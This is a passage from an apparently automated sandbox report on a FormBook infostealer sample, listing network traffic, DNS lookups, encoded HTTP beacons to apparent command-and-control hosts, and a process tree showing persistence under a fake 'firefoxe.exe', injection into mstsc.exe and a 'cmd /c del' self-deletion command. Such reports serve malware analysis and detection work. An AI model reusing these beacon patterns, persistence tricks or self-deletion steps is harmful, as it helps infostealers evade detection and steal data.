                                        Nov 20, 2020 16:33:35.049573898 CET | 80 | 49743 | 198.185.159.141 | 192.168.2.3
                                        Nov 20, 2020 16:33:35.049614906 CET | 80 | 49743 | 198.185.159.141 | 192.168.2.3
                                        Nov 20, 2020 16:33:35.049655914 CET | 49743 | 80 | 192.168.2.3 | 198.185.159.141
                                        Nov 20, 2020 16:33:35.049662113 CET | 80 | 49743 | 198.185.159.141 | 192.168.2.3
                                        Nov 20, 2020 16:33:35.049705029 CET | 80 | 49743 | 198.185.159.141 | 192.168.2.3
                                        Nov 20, 2020 16:33:35.049729109 CET | 49743 | 80 | 192.168.2.3 | 198.185.159.141
                                        Nov 20, 2020 16:33:35.049746037 CET | 80 | 49743 | 198.185.159.141 | 192.168.2.3
                                        Nov 20, 2020 16:33:35.049784899 CET | 80 | 49743 | 198.185.159.141 | 192.168.2.3
                                        Nov 20, 2020 16:33:35.049823999 CET | 80 | 49743 | 198.185.159.141 | 192.168.2.3
                                        Nov 20, 2020 16:33:35.049860001 CET | 80 | 49743 | 198.185.159.141 | 192.168.2.3
                                        Nov 20, 2020 16:33:35.049885988 CET | 49743 | 80 | 192.168.2.3 | 198.185.159.141
                                        Nov 20, 2020 16:33:35.049890041 CET | 80 | 49743 | 198.185.159.141 | 192.168.2.3
                                        Nov 20, 2020 16:33:35.049921036 CET | 80 | 49743 | 198.185.159.141 | 192.168.2.3
                                        Nov 20, 2020 16:33:35.049959898 CET | 80 | 49743 | 198.185.159.141 | 192.168.2.3
                                        Nov 20, 2020 16:33:35.049962044 CET | 49743 | 80 | 192.168.2.3 | 198.185.159.141
                                        Nov 20, 2020 16:33:35.049997091 CET | 80 | 49743 | 198.185.159.141 | 192.168.2.3
                                        Nov 20, 2020 16:33:35.050026894 CET | 49743 | 80 | 192.168.2.3 | 198.185.159.141
                                        Nov 20, 2020 16:33:35.050059080 CET | 80 | 49743 | 198.185.159.141 | 192.168.2.3
                                        Nov 20, 2020 16:33:35.050115108 CET | 49743 | 80 | 192.168.2.3 | 198.185.159.141
                                        Nov 20, 2020 16:33:35.156137943 CET | 80 | 49743 | 198.185.159.141 | 192.168.2.3
                                        Nov 20, 2020 16:33:35.156202078 CET | 80 | 49743 | 198.185.159.141 | 192.168.2.3
                                        Nov 20, 2020 16:33:35.156243086 CET | 80 | 49743 | 198.185.159.141 | 192.168.2.3
                                        Nov 20, 2020 16:33:35.156280041 CET | 49743 | 80 | 192.168.2.3 | 198.185.159.141
                                        Nov 20, 2020 16:33:35.156281948 CET | 80 | 49743 | 198.185.159.141 | 192.168.2.3
                                        Nov 20, 2020 16:33:35.156321049 CET | 80 | 49743 | 198.185.159.141 | 192.168.2.3
                                        Nov 20, 2020 16:33:35.156368971 CET | 80 | 49743 | 198.185.159.141 | 192.168.2.3
                                        Nov 20, 2020 16:33:35.156411886 CET | 80 | 49743 | 198.185.159.141 | 192.168.2.3
                                        Nov 20, 2020 16:33:35.156423092 CET | 49743 | 80 | 192.168.2.3 | 198.185.159.141
                                        Nov 20, 2020 16:33:35.156443119 CET | 49743 | 80 | 192.168.2.3 | 198.185.159.141
                                        Nov 20, 2020 16:33:35.156450987 CET | 80 | 49743 | 198.185.159.141 | 192.168.2.3
                                        Nov 20, 2020 16:33:35.156490088 CET | 80 | 49743 | 198.185.159.141 | 192.168.2.3
                                        Nov 20, 2020 16:33:35.156511068 CET | 49743 | 80 | 192.168.2.3 | 198.185.159.141
                                        Nov 20, 2020 16:33:35.156527042 CET | 80 | 49743 | 198.185.159.141 | 192.168.2.3
                                        Nov 20, 2020 16:33:35.156563997 CET | 80 | 49743 | 198.185.159.141 | 192.168.2.3
                                        Nov 20, 2020 16:33:35.156582117 CET | 49743 | 80 | 192.168.2.3 | 198.185.159.141
                                        Nov 20, 2020 16:33:35.156601906 CET | 80 | 49743 | 198.185.159.141 | 192.168.2.3
                                        Nov 20, 2020 16:33:35.156641006 CET | 80 | 49743 | 198.185.159.141 | 192.168.2.3
                                        Nov 20, 2020 16:33:35.156666994 CET | 49743 | 80 | 192.168.2.3 | 198.185.159.141
                                        Nov 20, 2020 16:33:35.156687975 CET | 80 | 49743 | 198.185.159.141 | 192.168.2.3
                                        Nov 20, 2020 16:33:35.156687975 CET | 49743 | 80 | 192.168.2.3 | 198.185.159.141
                                        Nov 20, 2020 16:33:35.156697989 CET | 49743 | 80 | 192.168.2.3 | 198.185.159.141
                                        Nov 20, 2020 16:33:35.156733990 CET | 80 | 49743 | 198.185.159.141 | 192.168.2.3
                                        Nov 20, 2020 16:33:35.156752110 CET | 49743 | 80 | 192.168.2.3 | 198.185.159.141
                                        Nov 20, 2020 16:33:35.156770945 CET | 80 | 49743 | 198.185.159.141 | 192.168.2.3
                                        Nov 20, 2020 16:33:35.156794071 CET | 49743 | 80 | 192.168.2.3 | 198.185.159.141
                                        Nov 20, 2020 16:33:35.156810045 CET | 80 | 49743 | 198.185.159.141 | 192.168.2.3
                                        Nov 20, 2020 16:33:35.156824112 CET | 49743 | 80 | 192.168.2.3 | 198.185.159.141
                                        Nov 20, 2020 16:33:35.156847954 CET | 80 | 49743 | 198.185.159.141 | 192.168.2.3
                                        Nov 20, 2020 16:33:35.156868935 CET | 49743 | 80 | 192.168.2.3 | 198.185.159.141
                                        Nov 20, 2020 16:33:35.156884909 CET | 80 | 49743 | 198.185.159.141 | 192.168.2.3
                                        Nov 20, 2020 16:33:35.156912088 CET | 49743 | 80 | 192.168.2.3 | 198.185.159.141
                                        Nov 20, 2020 16:33:35.156924963 CET | 80 | 49743 | 198.185.159.141 | 192.168.2.3
                                        Nov 20, 2020 16:33:35.156944036 CET | 49743 | 80 | 192.168.2.3 | 198.185.159.141
                                        Nov 20, 2020 16:33:35.156963110 CET | 80 | 49743 | 198.185.159.141 | 192.168.2.3
                                        Nov 20, 2020 16:33:35.156994104 CET | 49743 | 80 | 192.168.2.3 | 198.185.159.141
                                        Nov 20, 2020 16:33:35.157010078 CET | 80 | 49743 | 198.185.159.141 | 192.168.2.3
                                        Nov 20, 2020 16:33:35.157052994 CET | 80 | 49743 | 198.185.159.141 | 192.168.2.3
                                        Nov 20, 2020 16:33:35.157052994 CET | 49743 | 80 | 192.168.2.3 | 198.185.159.141
                                        Nov 20, 2020 16:33:35.157068014 CET | 49743 | 80 | 192.168.2.3 | 198.185.159.141
                                        Nov 20, 2020 16:33:35.157089949 CET | 80 | 49743 | 198.185.159.141 | 192.168.2.3
                                        Nov 20, 2020 16:33:35.157124996 CET | 49743 | 80 | 192.168.2.3 | 198.185.159.141
                                        Nov 20, 2020 16:33:35.157129049 CET | 80 | 49743 | 198.185.159.141 | 192.168.2.3
                                        Nov 20, 2020 16:33:35.157145023 CET | 49743 | 80 | 192.168.2.3 | 198.185.159.141
                                        Nov 20, 2020 16:33:35.157166958 CET | 80 | 49743 | 198.185.159.141 | 192.168.2.3
                                        Nov 20, 2020 16:33:35.157175064 CET | 49743 | 80 | 192.168.2.3 | 198.185.159.141
                                        Nov 20, 2020 16:33:35.157203913 CET | 80 | 49743 | 198.185.159.141 | 192.168.2.3
                                        Nov 20, 2020 16:33:35.157224894 CET | 49743 | 80 | 192.168.2.3 | 198.185.159.141
                                        Nov 20, 2020 16:33:35.157243013 CET | 80 | 49743 | 198.185.159.141 | 192.168.2.3
                                        Nov 20, 2020 16:33:35.157263041 CET | 49743 | 80 | 192.168.2.3 | 198.185.159.141
                                        Nov 20, 2020 16:33:35.157280922 CET | 80 | 49743 | 198.185.159.141 | 192.168.2.3

                                        UDP Packets

                                        Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                        Nov 20, 2020 16:31:37.716008902 CET | 65110 | 53 | 192.168.2.3 | 8.8.8.8
                                        Nov 20, 2020 16:31:37.753664970 CET | 53 | 65110 | 8.8.8.8 | 192.168.2.3
                                        Nov 20, 2020 16:31:38.886259079 CET | 58361 | 53 | 192.168.2.3 | 8.8.8.8
                                        Nov 20, 2020 16:31:38.913505077 CET | 53 | 58361 | 8.8.8.8 | 192.168.2.3
                                        Nov 20, 2020 16:31:40.199696064 CET | 63492 | 53 | 192.168.2.3 | 8.8.8.8
                                        Nov 20, 2020 16:31:40.226741076 CET | 53 | 63492 | 8.8.8.8 | 192.168.2.3
                                        Nov 20, 2020 16:31:41.282166958 CET | 60831 | 53 | 192.168.2.3 | 8.8.8.8
                                        Nov 20, 2020 16:31:41.309237003 CET | 53 | 60831 | 8.8.8.8 | 192.168.2.3
                                        Nov 20, 2020 16:31:42.732551098 CET | 60100 | 53 | 192.168.2.3 | 8.8.8.8
                                        Nov 20, 2020 16:31:42.759645939 CET | 53 | 60100 | 8.8.8.8 | 192.168.2.3
                                        Nov 20, 2020 16:31:43.578700066 CET | 53195 | 53 | 192.168.2.3 | 8.8.8.8
                                        Nov 20, 2020 16:31:43.605797052 CET | 53 | 53195 | 8.8.8.8 | 192.168.2.3
                                        Nov 20, 2020 16:31:44.620488882 CET | 50141 | 53 | 192.168.2.3 | 8.8.8.8
                                        Nov 20, 2020 16:31:44.647614002 CET | 53 | 50141 | 8.8.8.8 | 192.168.2.3
                                        Nov 20, 2020 16:31:45.626663923 CET | 53023 | 53 | 192.168.2.3 | 8.8.8.8
                                        Nov 20, 2020 16:31:45.653712034 CET | 53 | 53023 | 8.8.8.8 | 192.168.2.3
                                        Nov 20, 2020 16:31:46.632806063 CET | 49563 | 53 | 192.168.2.3 | 8.8.8.8
                                        Nov 20, 2020 16:31:46.659962893 CET | 53 | 49563 | 8.8.8.8 | 192.168.2.3
                                        Nov 20, 2020 16:31:47.462408066 CET | 51352 | 53 | 192.168.2.3 | 8.8.8.8
                                        Nov 20, 2020 16:31:47.489501953 CET | 53 | 51352 | 8.8.8.8 | 192.168.2.3
                                        Nov 20, 2020 16:31:48.805653095 CET | 59349 | 53 | 192.168.2.3 | 8.8.8.8
                                        Nov 20, 2020 16:31:48.832789898 CET | 53 | 59349 | 8.8.8.8 | 192.168.2.3
                                        Nov 20, 2020 16:31:49.804553032 CET | 57084 | 53 | 192.168.2.3 | 8.8.8.8
                                        Nov 20, 2020 16:31:49.831583977 CET | 53 | 57084 | 8.8.8.8 | 192.168.2.3
                                        Nov 20, 2020 16:31:59.875031948 CET | 58823 | 53 | 192.168.2.3 | 8.8.8.8
                                        Nov 20, 2020 16:31:59.902120113 CET | 53 | 58823 | 8.8.8.8 | 192.168.2.3
                                        Nov 20, 2020 16:32:01.389939070 CET | 57568 | 53 | 192.168.2.3 | 8.8.8.8
                                        Nov 20, 2020 16:32:01.416979074 CET | 53 | 57568 | 8.8.8.8 | 192.168.2.3
                                        Nov 20, 2020 16:32:07.183087111 CET | 50540 | 53 | 192.168.2.3 | 8.8.8.8
                                        Nov 20, 2020 16:32:07.218885899 CET | 53 | 50540 | 8.8.8.8 | 192.168.2.3
                                        Nov 20, 2020 16:32:10.353229046 CET | 54366 | 53 | 192.168.2.3 | 8.8.8.8
                                        Nov 20, 2020 16:32:10.380398035 CET | 53 | 54366 | 8.8.8.8 | 192.168.2.3
                                        Nov 20, 2020 16:32:10.462378979 CET | 53034 | 53 | 192.168.2.3 | 8.8.8.8
                                        Nov 20, 2020 16:32:10.489438057 CET | 53 | 53034 | 8.8.8.8 | 192.168.2.3
                                        Nov 20, 2020 16:32:12.298270941 CET | 57762 | 53 | 192.168.2.3 | 8.8.8.8
                                        Nov 20, 2020 16:32:12.333836079 CET | 53 | 57762 | 8.8.8.8 | 192.168.2.3
                                        Nov 20, 2020 16:32:27.295954943 CET | 55435 | 53 | 192.168.2.3 | 8.8.8.8
                                        Nov 20, 2020 16:32:27.322926044 CET | 53 | 55435 | 8.8.8.8 | 192.168.2.3
                                        Nov 20, 2020 16:32:28.421916962 CET | 50713 | 53 | 192.168.2.3 | 8.8.8.8
                                        Nov 20, 2020 16:32:28.426913023 CET | 56132 | 53 | 192.168.2.3 | 8.8.8.8
                                        Nov 20, 2020 16:32:28.454065084 CET | 53 | 56132 | 8.8.8.8 | 192.168.2.3
                                        Nov 20, 2020 16:32:28.457412958 CET | 53 | 50713 | 8.8.8.8 | 192.168.2.3
                                        Nov 20, 2020 16:32:29.369177103 CET | 58987 | 53 | 192.168.2.3 | 8.8.8.8
                                        Nov 20, 2020 16:32:29.412585020 CET | 53 | 58987 | 8.8.8.8 | 192.168.2.3
                                        Nov 20, 2020 16:32:34.747100115 CET | 56579 | 53 | 192.168.2.3 | 8.8.8.8
                                        Nov 20, 2020 16:32:34.784126043 CET | 53 | 56579 | 8.8.8.8 | 192.168.2.3
                                        Nov 20, 2020 16:33:16.535996914 CET | 60633 | 53 | 192.168.2.3 | 8.8.8.8
                                        Nov 20, 2020 16:33:16.563107967 CET | 53 | 60633 | 8.8.8.8 | 192.168.2.3
                                        Nov 20, 2020 16:33:34.681273937 CET | 61292 | 53 | 192.168.2.3 | 8.8.8.8
                                        Nov 20, 2020 16:33:34.720000029 CET | 53 | 61292 | 8.8.8.8 | 192.168.2.3
                                        Nov 20, 2020 16:33:40.177280903 CET | 63619 | 53 | 192.168.2.3 | 8.8.8.8
                                        Nov 20, 2020 16:33:41.199937105 CET | 63619 | 53 | 192.168.2.3 | 8.8.8.8
                                        Nov 20, 2020 16:33:41.229835987 CET | 53 | 63619 | 8.8.8.8 | 192.168.2.3
                                        Nov 20, 2020 16:33:41.263674021 CET | 53 | 63619 | 8.8.8.8 | 192.168.2.3
                                        Nov 20, 2020 16:33:49.797297955 CET | 64938 | 53 | 192.168.2.3 | 8.8.8.8
                                        Nov 20, 2020 16:33:49.852216005 CET | 53 | 64938 | 8.8.8.8 | 192.168.2.3

                                        DNS Queries

                                        Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                                        Nov 20, 2020 16:33:34.681273937 CET | 192.168.2.3 | 8.8.8.8 | 0x1cd1 | Standard query (0) | www.ghoster.agency | A (IP address) | IN (0x0001)
                                        Nov 20, 2020 16:33:40.177280903 CET | 192.168.2.3 | 8.8.8.8 | 0xa019 | Standard query (0) | www.jibenentreprenad.mobi | A (IP address) | IN (0x0001)
                                        Nov 20, 2020 16:33:41.199937105 CET | 192.168.2.3 | 8.8.8.8 | 0xa019 | Standard query (0) | www.jibenentreprenad.mobi | A (IP address) | IN (0x0001)
                                        Nov 20, 2020 16:33:49.797297955 CET | 192.168.2.3 | 8.8.8.8 | 0x9e95 | Standard query (0) | www.amtpsychology.com | A (IP address) | IN (0x0001)

                                        DNS Answers

                                        Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                        Nov 20, 2020 16:33:34.720000029 CET | 8.8.8.8 | 192.168.2.3 | 0x1cd1 | No error (0) | www.ghoster.agency | ext-sq.squarespace.com | | CNAME (Canonical name) | IN (0x0001)
                                        Nov 20, 2020 16:33:34.720000029 CET | 8.8.8.8 | 192.168.2.3 | 0x1cd1 | No error (0) | ext-sq.squarespace.com | | 198.185.159.141 | A (IP address) | IN (0x0001)
                                        Nov 20, 2020 16:33:34.720000029 CET | 8.8.8.8 | 192.168.2.3 | 0x1cd1 | No error (0) | ext-sq.squarespace.com | | 198.49.23.141 | A (IP address) | IN (0x0001)
                                        Nov 20, 2020 16:33:41.229835987 CET | 8.8.8.8 | 192.168.2.3 | 0xa019 | No error (0) | www.jibenentreprenad.mobi | jibenentreprenad.mobi | | CNAME (Canonical name) | IN (0x0001)
                                        Nov 20, 2020 16:33:41.229835987 CET | 8.8.8.8 | 192.168.2.3 | 0xa019 | No error (0) | jibenentreprenad.mobi | | 184.168.131.241 | A (IP address) | IN (0x0001)
                                        Nov 20, 2020 16:33:41.263674021 CET | 8.8.8.8 | 192.168.2.3 | 0xa019 | No error (0) | www.jibenentreprenad.mobi | jibenentreprenad.mobi | | CNAME (Canonical name) | IN (0x0001)
                                        Nov 20, 2020 16:33:41.263674021 CET | 8.8.8.8 | 192.168.2.3 | 0xa019 | No error (0) | jibenentreprenad.mobi | | 184.168.131.241 | A (IP address) | IN (0x0001)
                                        Nov 20, 2020 16:33:49.852216005 CET | 8.8.8.8 | 192.168.2.3 | 0x9e95 | Name error (3) | www.amtpsychology.com | none | none | A (IP address) | IN (0x0001)

                                        HTTP Request Dependency Graph

                                        • www.ghoster.agency
                                        • www.jibenentreprenad.mobi

                                        HTTP Packets

                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                        0 | 192.168.2.3 | 49743 | 198.185.159.141 | 80 | C:\Windows\explorer.exe
                                        Timestamp | kBytes transferred | Direction | Data
                                        Nov 20, 2020 16:33:34.833543062 CET | 6320 | OUT | GET /bg8v/?dR-0T=Hsg8WmNsaLMOQIlEIMfuFbk4MqbSZJWeSLNd01xx1olwbrd2uyfvFyB8JS14b3uA3WpV&Fxl0dR=KdShEXiX HTTP/1.1
                                        Host: www.ghoster.agency
                                        Connection: close
                                        Data Raw: 00 00 00 00 00 00 00
                                        Data Ascii:
                                        Nov 20, 2020 16:33:34.942893982 CET | 6321 | IN | HTTP/1.1 400 Bad Request
                                        content-length: 77564
                                        expires: Thu, 01 Jan 1970 00:00:00 UTC
                                        pragma: no-cache
                                        cache-control: no-cache, must-revalidate
                                        content-type: text/html; charset=UTF-8
                                        connection: close
                                        date: Fri, 20 Nov 2020 15:33:34 UTC
                                        x-contextid: Bwdk82gG/KU21r2Fa
                                        server: Squarespace
                                        Data Ascii: <!DOCTYPE html><head> <title>400 Bad Request</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <style type="text/css"> body { background: white; } main { position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); text-align: center; min-width: 95vw; } main h1 { font-weight: 300; font-size: 4.6em; color: #191919; margin: 0 0 11px 0; } main p { font-size: 1.4em; color: #3a3a3a; font-weight: 300; line-height: 2em; margin: 0; } main p a { color: #3a3a3a; text-decoration: none; border-bottom: solid 1px #3a3a3a; } body { font-family: "Clarkson", sans-serif; font-size: 12px; } #status-page { display: none; } footer { position: absolute; bottom: 22px; left: 0; width: 100%; text-align: center; line-height: 2em; } footer span { margin: 0 11px; font-size: 1em;


                                        Session ID: 1
                                        Source IP: 192.168.2.3
                                        Source Port: 49744
                                        Destination IP: 184.168.131.241
                                        Destination Port: 80
                                        Process: C:\Windows\explorer.exe
                                        Timestamp: Nov 20, 2020 16:33:44.590300083 CET
                                        kBytes transferred: 6402
                                        Direction: OUT
                                        Data: GET /bg8v/?dR-0T=BcRzG6gD98FnRJnM8S7gZqeq6OFb5sR0iVW6Pm7cF5yWostREqJtYuV2Juo62Dzc0Jb1&Fxl0dR=KdShEXiX HTTP/1.1
                                        Host: www.jibenentreprenad.mobi
                                        Connection: close
                                        Data Raw: 00 00 00 00 00 00 00
                                        Data Ascii:
                                        Timestamp: Nov 20, 2020 16:33:44.781363964 CET
                                        kBytes transferred: 6403
                                        Direction: IN
                                        Data: HTTP/1.1 301 Moved Permanently
                                        Server: nginx/1.16.1
                                        Date: Fri, 20 Nov 2020 15:33:44 GMT
                                        Content-Type: text/html; charset=utf-8
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Location: https://www.jiben.se/bg8v/?dR-0T=BcRzG6gD98FnRJnM8S7gZqeq6OFb5sR0iVW6Pm7cF5yWostREqJtYuV2Juo62Dzc0Jb1&Fxl0dR=KdShEXiX
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Code Manipulations

                                        Statistics

                                        Behavior


                                        System Behavior

                                        General

                                        Start time:16:31:41
                                        Start date:20/11/2020
                                        Path:C:\Users\user\Desktop\kayx.exe
                                        Wow64 process (32bit):true
                                        Commandline:'C:\Users\user\Desktop\kayx.exe'
                                        Imagebase:0xec0000
                                        File size:432640 bytes
                                        MD5 hash:A80E73A824B655491F54278B7A29467D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:.Net C# or VB.NET
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.352630853.00000000041E1000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.352630853.00000000041E1000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.352630853.00000000041E1000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        Reputation:low

                                        General

                                        Start time:16:32:45
                                        Start date:20/11/2020
                                        Path:C:\Users\user\Desktop\kayx.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Users\user\Desktop\kayx.exe
                                        Imagebase:0x200000
                                        File size:432640 bytes
                                        MD5 hash:A80E73A824B655491F54278B7A29467D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:low

                                        General

                                        Start time:16:32:46
                                        Start date:20/11/2020
                                        Path:C:\Users\user\Desktop\kayx.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Users\user\Desktop\kayx.exe
                                        Imagebase:0x2c0000
                                        File size:432640 bytes
                                        MD5 hash:A80E73A824B655491F54278B7A29467D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:low

                                        General

                                        Start time:16:32:46
                                        Start date:20/11/2020
                                        Path:C:\Users\user\Desktop\kayx.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Users\user\Desktop\kayx.exe
                                        Imagebase:0x400000
                                        File size:432640 bytes
                                        MD5 hash:A80E73A824B655491F54278B7A29467D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.396099862.0000000000830000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.396099862.0000000000830000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.396099862.0000000000830000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.396027525.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.396027525.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.396027525.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.396259639.0000000000980000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.396259639.0000000000980000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.396259639.0000000000980000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000001.351516494.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000001.351516494.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000001.351516494.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                        Reputation:low

                                        General

                                        Start time:16:32:49
                                        Start date:20/11/2020
                                        Path:C:\Windows\explorer.exe
                                        Wow64 process (32bit):false
                                        Commandline:
                                        Imagebase:0x7ff714890000
                                        File size:3933184 bytes
                                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        General

                                        Start time:16:32:52
                                        Start date:20/11/2020
                                        Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe
                                        Wow64 process (32bit):true
                                        Commandline:'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe'
                                        Imagebase:0x9a0000
                                        File size:432640 bytes
                                        MD5 hash:A80E73A824B655491F54278B7A29467D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:.Net C# or VB.NET
                                        Antivirus matches:
                                        • Detection: 100%, Avira
                                        • Detection: 100%, Joe Sandbox ML
                                        • Detection: 46%, ReversingLabs
                                        Reputation:low

                                        General

                                        Start time:16:33:00
                                        Start date:20/11/2020
                                        Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe
                                        Wow64 process (32bit):true
                                        Commandline:'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe'
                                        Imagebase:0x3e0000
                                        File size:432640 bytes
                                        MD5 hash:A80E73A824B655491F54278B7A29467D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:.Net C# or VB.NET
                                        Reputation:low

                                        General

                                        Start time:16:33:05
                                        Start date:20/11/2020
                                        Path:C:\Windows\SysWOW64\mstsc.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\mstsc.exe
                                        Imagebase:0x3f0000
                                        File size:3444224 bytes
                                        MD5 hash:2412003BE253A515C620CE4890F3D8F3
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000015.00000002.485444810.0000000002F00000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000015.00000002.485444810.0000000002F00000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000015.00000002.485444810.0000000002F00000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000015.00000002.484279657.0000000000A00000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000015.00000002.484279657.0000000000A00000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000015.00000002.484279657.0000000000A00000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        Reputation:moderate

                                        General

                                        Start time:16:33:08
                                        Start date:20/11/2020
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:/c del 'C:\Users\user\Desktop\kayx.exe'
                                        Imagebase:0xbd0000
                                        File size:232960 bytes
                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        General

                                        Start time:16:33:09
                                        Start date:20/11/2020
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff6b2800000
                                        File size:625664 bytes
                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        Disassembly

                                        Code Analysis
